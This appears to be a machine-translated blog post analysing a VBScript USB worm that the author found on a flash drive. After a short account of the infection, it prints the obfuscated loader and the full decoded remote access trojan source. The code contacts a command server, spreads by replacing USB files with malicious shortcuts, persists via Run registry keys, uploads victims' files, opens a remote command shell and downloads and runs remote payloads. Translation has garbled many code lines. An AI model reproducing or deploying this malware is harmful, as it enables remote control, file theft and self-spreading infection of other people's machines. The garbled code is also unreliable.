Virus Name:flgjahzqvm.vbs

The author recently because on the public computer to copy some files, come back to open and found that the contents of the U disk has become a shortcut, and the root directory was impressively found a. vbs file.

The properties of the shortcut are opened, and the target also points to the Flgjahzqvm.vbs file before opening.

The source file for the virus is written like this: "

B1= "3"
B2= "9"
B3= "|"
b4= "6"
b5= "0"
B6= "|"
b7= "9"
b8= "1"
B9= "|"
b10= "3"
B11= "2"
B12= "|"
b13= "1"
b14= "1"
B15= "4"
B16= "|"
b17= "1"
b18= "0"
b19= "1"
B20= "|"
b21= "9"
B22= "9"
B23= "|"
b24= "1"
b25= "1"
b26= "1"
B27= "|"
b28= "1"
b29= "0"
b30= "0"
B31= "|"
B32= "1"
b33= "0"
b34= "1"
B35= "|"
b36= "1"
b37= "1"
B38= "4"
B39= "|"
b40= "3"
B41= "2"
B42= "|"
b43= "5"
B44= "8"
B45= "|"
b46= "3"
b47= "2"
B48= "|"
b49= "1"
b50= "0"
B1 & B2 & B3 & B4 & b5 & b6 & B7 & B8 & B9 & B10 & B11 & B12 & B13 &am b1= P B14 & B15 & B16 & B17 & B18 & B19 & B20 & B21 & B22 & B23 & B24 & B25 & B2 6 & B27 & B28 & b29 & B30 & B31 & B32 & b33 & b34 & b35 & B36 & b37 & B38 & B39 & B40 & b41 & B42 & b43 & B44 & B45 & b46 & b47 & b48 & b49 & B50
B51= "4"
B52= "|"
b53= "1"
b54= "1"
b55= "1"
B56= "|"
b57= "1"
b58= "1"
b59= "7"
B60= "|"
b61= "1"
b62= "0"
b63= "0"
B64= "|"
b65= "1"
b66= "0"
b67= "5"
B68= "|"
b69= "1"
b70= "1"
b71= "0"
B72= "|"
b73= "1"
b74= "0"
b75= "5"
B76= "|"
b77= "3"
b78= "2"
B79= "|"
B80= "4"
b81= "0"
B82= "|"
b83= "9"
b84= "9"
B85= "|"
B86= "4"
b87= "1"
B88= "|"
b89= "3"
b90= "2"
B91= "|"
B92= "1"
b93= "1"
b94= "5"
B95= "|"
b96= "1"
b97= "0"
b98= "7"
B99= "|"
b100= "1"
B1 & b51 & B52 & b53 & b54 & b55 & b56 & b57 & b58 & b59 & b60 & B61 & b1= B62 & B63 & b64 & b65 & b66 & b67 & b68 & b69 & b70 & b71 & b72 & b73 & B & B75 & b76 & b77 & b78 & b79 & b80 & b81 & b82 & b83 & b84 & b85 & b86 & b87 & b88 & b89 & b90 & b91 & B92 & b93 & b94 & b95 & b96 & b97 & B98 & Amp B99 & B100
B101= "2"
B102= "1"
B103= "|"
b104= "1"
b105= "1"
b106= "2"
B107= "|"
b108= "1"
b109= "0"
b110= "1"
B111= "|"
B112= "3"
b113= "2"
B114= "|"
b115= "5"
B116= "8"
B117= "|"
b118= "3"
b119= "2"
B120= "|"
b121= "1"

......

B1 = SPLIT (B1, "|")
For I = 0 to UBOUND (B1)-1
NJ = NJ & CHR (B1 (I))
NEXT
Executeglobal (NJ)

“

is not at first glance a bunch of variables, a face to be confused force?

In fact, it will split the string into a bunch of characters, so as to avoid antivirus software Avira.

This is the case after translation:

' <[Recoder:houdini (c) Skype:houdini-fx]>

' =-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Host = "Medoutil.zapto.org"
Port = 88
InstallDir = "%temp%"
Lnkfile = True
Lnkfolder = True

' =-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

Dim shellobj
Set shellobj = WScript.CreateObject ("Wscript.Shell")
Dim filesystemobj
Set filesystemobj = CreateObject ("Scripting.FileSystemObject")
Dim httpobj
Set httpobj = CreateObject ("Msxml2.xmlhttp")

' =-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

Installname = WScript.ScriptName
startup = Shellobj.specialfolders ("Startup") & "\"
InstallDir = Shellobj.expandenvironmentstrings (installdir) & "\"
If not filesystemobj.folderexists (installdir) Then installdir = Shellobj.expandenvironmentstrings ("%temp%") & "\"
Spliter = "<" & "|" & ">"
Sleep = 5000
Dim response
Dim cmd
Dim param
info = ""
usbspreading = ""
StartDate = ""
Dim oneonce

' =-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
On Error Resume Next

Instance
While True

Install

Response = ""
Response = post ("Is-ready", "" ")
cmd = Split (Response,spliter)
Select Case cmd (0)
Case "Excecute"
param = cmd (1)
Execute param
Case "Update"
param = cmd (1)
Oneonce.close
Set oneonce = Filesystemobj.opentextfile (InstallDir & Installname, 2, false)
Oneonce.write param
Oneonce.close
Shellobj.run "Wscript.exe//b" & Chr & installdir & Installname & Chr (34)
Wscript.Quit
Case "Uninstall"
Uninstall
Case "Send"
Download cmd (1), cmd (2)
Case "Site-send"
Sitedownloader cmd (1), cmd (2)
Case "Recv"
param = cmd (1)
Upload (param)
Case "Enum-driver"
Post "Is-enum-driver", Enumdriver
Case "ENUM-FAF"
param = cmd (1)
Post "IS-ENUM-FAF", ENUMFAF (param)
Case "Enum-process"
Post "Is-enum-process", enumprocess
Case "Cmd-shell"
param = cmd (1)
Post "Is-cmd-shell", Cmdshell (param)
Case "Delete"
param = cmd (1)
DELETEFAF (param)
Case "Exit-process"
param = cmd (1)
ExitProcess (param)
Case "Sleep"
param = cmd (1)
sleep = eval (param)
End Select

Wscript.Sleep Sleep

Wend

Sub Install
On Error Resume Next
Dim lnkobj
Dim filename
Dim foldername
Dim Fileicon
Dim Foldericon

Upstart
In Filesystemobj.drives

If Drive.isready = True Then
If drive.freespace > 0 Then
If Drive.drivetype = 1 Then
Filesystemobj.copyfile wscript.scriptfullname, Drive.path & "\" & Installname,true
If Filesystemobj.fileexists (Drive.path & "\" & Installname) Then
Filesystemobj.getfile (Drive.path & "\" & installname). attributes = 2+4
End If
For each of the file in Filesystemobj.getfolder (Drive.path & "\"). Files
If not lnkfile then exit for
If InStr (File.name, ".") Then
If LCase (Split (File.name, ".") (UBound (Split (File.name, ".")))) <> "LNK" then
File.attributes = 2+4
If UCase (file.name) <> UCase (installname) Then
filename = Split (File.name, ".")
Set lnkobj = Shellobj.createshortcut (Drive.path & "\" & filename (0) & ". Lnk")
Lnkobj.windowstyle = 7
Lnkobj.targetpath = "cmd.exe"
Lnkobj.workingdirectory = ""
Lnkobj.arguments = "/C Start" & Replace (Installname, "", ChrW & "" & ChrW) & "&start" & Replace (File.name, "", ChrW & "" & ChrW) & "&exit"
Fileicon = Shellobj.regread ("hkey_local_machine\software\classes\" & Shellobj.regread ("HKEY_LOCAL_MACHINE\ Software\classes\. "& Split (File.name,". ") (UBound (Split (File.name, "."))) & "\") & "\defaulticon\")
If InStr (Fileicon, ",") = 0 Then
Lnkobj.iconlocation = File.path
Else
Lnkobj.iconlocation = Fileicon
End If
Lnkobj.save ()
End If
End If
End If
Next
For each folder in Filesystemobj.getfolder (Drive.path & "\"). Subfolders
If not Lnkfolder then exit for
Folder.attributes = 2+4
FolderName = Folder.name
Set lnkobj = Shellobj.createshortcut (Drive.path & "\" & FolderName & ". Lnk")
Lnkobj.windowstyle = 7
Lnkobj.targetpath = "cmd.exe"
Lnkobj.workingdirectory = ""
Lnkobj.arguments = "/C Start" & Replace (Installname, "", ChrW) & "" & ChrW "&" &start Explore R "& Replace (Folder.name," ", ChrW &" "& ChrW) &" &exit "
Foldericon = Shellobj.regread ("hkey_local_machine\software\classes\folder\defaulticon\")
If InStr (Foldericon, ",") = 0 Then
Lnkobj.iconlocation = Folder.path
Else
Lnkobj.iconlocation = Foldericon
End If
Lnkobj.save ()
Next
End If
End If
End If
Next
Err.Clear
End Sub

Sub Uninstall
On Error Resume Next
Dim filename
Dim foldername

Shellobj.regdelete "hkey_current_user\software\microsoft\windows\currentversion\run\" & Split (Installname, ".") (0)
Shellobj.regdelete "hkey_local_machine\software\microsoft\windows\currentversion\run\" & Split (Installname, ".") (0)
Filesystemobj.deletefile Startup & Installname, True
Filesystemobj.deletefile Wscript.scriptfullname, True

In Filesystemobj.drives
If Drive.isready = True Then
If drive.freespace > 0 Then
If Drive.drivetype = 1 Then
For each file in Filesystemobj.getfolder (Drive.path & "\"). Files
On Error Resume Next
If InStr (File.name, ".") Then
If LCase (Split (File.name, ".") (UBound (Split (File.name, ".")))) <> "LNK" then
File.attributes = 0
If UCase (file.name) <> UCase (installname) Then
filename = Split (File.name, ".")
Filesystemobj.deletefile (Drive.path & "\" & filename (0) & ". Lnk")
Else
Filesystemobj.deletefile (Drive.path & "\" & File.name)
End If
Else
Filesystemobj.deletefile (File.path)
End If
End If
Next
For each folder in Filesystemobj.getfolder (Drive.path & "\"). Subfolders
Folder.attributes = 0
Next
End If
End If
End If
Next
Wscript.Quit
End Sub

function post (cmd, param)

Post = param
Httpobj.open "POST", "http://" & "Host &", "& Port &"/"& cmd, False
Httpobj.setrequestheader "User-agent:", information
Httpobj.send param
Post = Httpobj.responsetext
End Function

function information
On Error Resume Next
If inf = "Then"
inf = hwid & Spliter
inf = inf & Shellobj.expandenvironmentstrings ("%computername%") & Spliter
inf = inf & Shellobj.expandenvironmentstrings ("%username%") & Spliter

Set root = GetObject ("Winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
Set os = Root.execquery ("SELECT * from Win32_OperatingSystem")
For each osinfo in OS
inf = inf & osinfo.caption & Spliter
Exit For
Next
inf = inf & "Plus" & Spliter
INF = inf & security & Spliter
inf = inf & usbspreading
Information = inf
Else
Information = inf
End If
End Function

Sub Upstart ()
On Error Resume Next

Shellobj.regwrite "hkey_current_user\software\microsoft\windows\currentversion\run\" & Split (Installname, ".") (0), "Wscript.exe//b" & ChrW & installdir & Installname & ChrW, "REG_SZ"
Shellobj.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\run\" & Split (Installname, ".") (0), "Wscript.exe//b" & ChrW & installdir & Installname & ChrW, "REG_SZ"
Filesystemobj.copyfile Wscript.scriptfullname,installdir & Installname,true
Filesystemobj.copyfile Wscript.scriptfullname,startup & Installname, True

End Sub

function Hwid
On Error Resume Next

Set root = GetObject ("Winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
Set disks = Root.execquery ("SELECT * from Win32_LogicalDisk")
For each disk in disks
If Disk.volumeserialnumber <> "then
Hwid = Disk.volumeserialnumber
Exit For
End If
Next
End Function

function security
On Error Resume Next

Security = ""

Set objWMIService = GetObject ("Winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
Set colitems = objWMIService.ExecQuery ("SELECT * from Win32_OperatingSystem", 48)
For each objitem in colitems
Versionstr = Split (Objitem.version, ".")
Next
Versionstr = Split (Colitems.version, ".")
OSVersion = versionstr (0) & "."
For x = 1 To UBound (VERSIONSTR)
OSVersion = osversion & Versionstr (i)
Next
OSVersion = eval (osversion)
If osversion > 6 then sc = "Securitycenter2" Else sc = "SecurityCenter"

Set Objsecuritycenter = GetObject ("winmgmts:\\localhost\root\" & SC)
Set Colantivirus = Objsecuritycenter.execquery ("SELECT * from Antivirusproduct", "WQL", 0)

For each objantivirus in Colantivirus
Security = security & Objantivirus.displayname & "."
Next
If security = "then Security =" Nan-av "
End Function

function instance
On Error Resume Next

usbspreading = Shellobj.regread ("hkey_local_machine\software\" & Split (Installname, ".") (0) & "\")
If usbspreading = "Then
If LCase (Mid (wscript.scriptfullname,2)) = ": \" & LCase (Installname) Then
usbspreading = "true-" & Date
Shellobj.regwrite "Hkey_local_machine\software\" & Split (Installname, ".") (0) & "\", Usbspreading, "REG_SZ"
Else
Usbspreading = "false-" & Date
Shellobj.regwrite "Hkey_local_machine\software\" & Split (Installname, ".") (0) & "\", Usbspreading, "REG_SZ"

End If
End If

Upstart
Set scriptfullnameshort = Filesystemobj.getfile (wscript.scriptfullname)
Set installfullnameshort = Filesystemobj.getfile (InstallDir & Installname)
If LCase (Scriptfullnameshort.shortpath) <> LCase (Installfullnameshort.shortpath) Then
Shellobj.run "Wscript.exe//b" & Chr & installdir & Installname & Chr (34)
Wscript.Quit
End If
Err.Clear
Set oneonce = Filesystemobj.opentextfile (InstallDir & Installname, 8, false)
If Err.Number > 0 Then Wscript.Quit
End Function

Sub Sitedownloader (Fileurl,filename)

Strlink = FileURL
Strsaveto = installdir & filename
Set objhttpdownload = CreateObject ("Msxml2.xmlhttp")
Objhttpdownload.open "Get", Strlink, False
Objhttpdownload.send

Set objfsodownload = CreateObject ("Scripting.FileSystemObject")
If Objfsodownload.fileexists (Strsaveto) Then
Objfsodownload.deletefile (Strsaveto)
End If

If Objhttpdownload.status =
Dim objstreamdownload
Set objstreamdownload = CreateObject ("ADODB.stream")
With Objstreamdownload
. Type = 1
. Open
. Write Objhttpdownload.responsebody
. SaveToFile Strsaveto
. Close
End With
Set objstreamdownload = Nothing
End If
If Objfsodownload.fileexists (Strsaveto) Then
Shellobj.run Objfsodownload.getfile (strsaveto). ShortPath
End If
End Sub

Sub Download (fileurl,filedir)

If Filedir = "Then
Filedir = InstallDir
End If

Strsaveto = Filedir & Mid (FileURL, InStrRev (FileURL, "\") + 1)
Set objhttpdownload = CreateObject ("Msxml2.xmlhttp")
Objhttpdownload.open "POST", "http://" & Host & "," & Port & "/" & "Is-sending" & spliter & File URL, False
Objhttpdownload.send ""

Set objfsodownload = CreateObject ("Scripting.FileSystemObject")
If Objfsodownload.fileexists (Strsaveto) Then
Objfsodownload.deletefile (Strsaveto)
End If
If Objhttpdownload.status =
Dim objstreamdownload
Set objstreamdownload = CreateObject ("ADODB.stream")
With Objstreamdownload
. Type = 1
. Open
. Write Objhttpdownload.responsebody
. SaveToFile Strsaveto
. Close
End With
Set objstreamdownload = Nothing
End If
If Objfsodownload.fileexists (Strsaveto) Then
Shellobj.run Objfsodownload.getfile (strsaveto). ShortPath
End If
End Sub

function upload (fileurl)

Dim Httpobj,objstreamuploade,buffer
Set Objstreamuploade = CreateObject ("ADODB.stream")
With Objstreamuploade
. Type = 1
. Open
. LoadFromFile FileURL
Buffer =. Read
. Close
End With
Set objstreamdownload = Nothing
Set httpobj = CreateObject ("Msxml2.xmlhttp")
Httpobj.open "POST", "http://" & Host & "," & Port & "/" & "Is-recving" & Spliter & FileURL, FAL Se
Httpobj.send Buffer
End Function

function Enumdriver ()

In Filesystemobj.drives
If Drive.isready = True Then
Enumdriver = enumdriver & Drive.path & "|" & Drive.drivetype & Spliter
End If
Next
End Function

function Enumfaf (enumdir)

ENUMFAF = Enumdir & Spliter
For each folder in Filesystemobj.getfolder (Enumdir). Subfolders
ENUMFAF = ENUMFAF & folder.name & "|" & "&" | "&" D "&" | "& Folder.attributes & Spliter
Next

For each file in Filesystemobj.getfolder (Enumdir). Files
ENUMFAF = ENUMFAF & file.name & "|" & File.size & "|" & "F" & "|" & File.attributes & Spli ter

Next
End Function

function enumprocess ()

On Error Resume Next

Set objWMIService = GetObject ("Winmgmts:\\.\root\cimv2")
Set colitems = objWMIService.ExecQuery ("SELECT * from Win32_Process", 48)

Dim objitem
For each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
enumprocess = enumprocess & Objitem.executablepath & Spliter
Next
End Function

Sub ExitProcess (PID)
On Error Resume Next

Shellobj.run "taskkill/f/t/pid" & Pid,7,true
End Sub

Sub Deletefaf (URL)
On Error Resume Next

Filesystemobj.deletefile URL
Filesystemobj.deletefolder URL

End Sub

function Cmdshell (cmd)

Dim Httpobj,oexec,readallfromany

Set oexec = Shellobj.exec ("%comspec%/C" & cmd)
If not Oexec.stdout.atendofstream then
Readallfromany = Oexec.stdout.readall
ElseIf not Oexec.stderr.atendofstream Then
Readallfromany = Oexec.stderr.readall
Else
Readallfromany = ""
End If

Cmdshell = Readallfromany
End Function

Virus Name:flgjahzqvm.vbs